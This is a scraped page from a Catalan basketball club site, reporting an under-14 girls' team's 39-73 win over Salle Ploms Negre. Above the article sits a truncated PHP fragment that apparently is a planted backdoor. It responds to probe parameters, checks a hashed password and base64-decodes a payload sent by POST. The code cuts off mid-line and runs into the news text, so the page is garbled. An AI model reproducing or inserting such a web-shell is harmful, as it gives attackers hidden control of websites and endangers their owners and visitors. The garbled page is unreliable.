function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'infantil femení 06 A fa una sortida fulgurant i derrota la Salle Ploms Negre (39-73) - Tgn Bàsquet Club -

L’infantil femení 06 A fa una sortida fulgurant i derrota la Salle Ploms Negre (39-73)

Updated: gener 21, 2020

L’equip infantil femení 06 A del TGN Bàsquet va derrotar clarament el Salle Ploms Negre en un partit que es va decidir a favor de les visitants en el primer quart. Les jugadores que entrena Agustí Oriol van fer un parcial de 3-24 de sortida que deixava el matx mig sentenciat. Malgrat els problemes en l’anotació del segon quart, les liles van saber administrar l’avantatge i ampliar-lo durant tot el partit.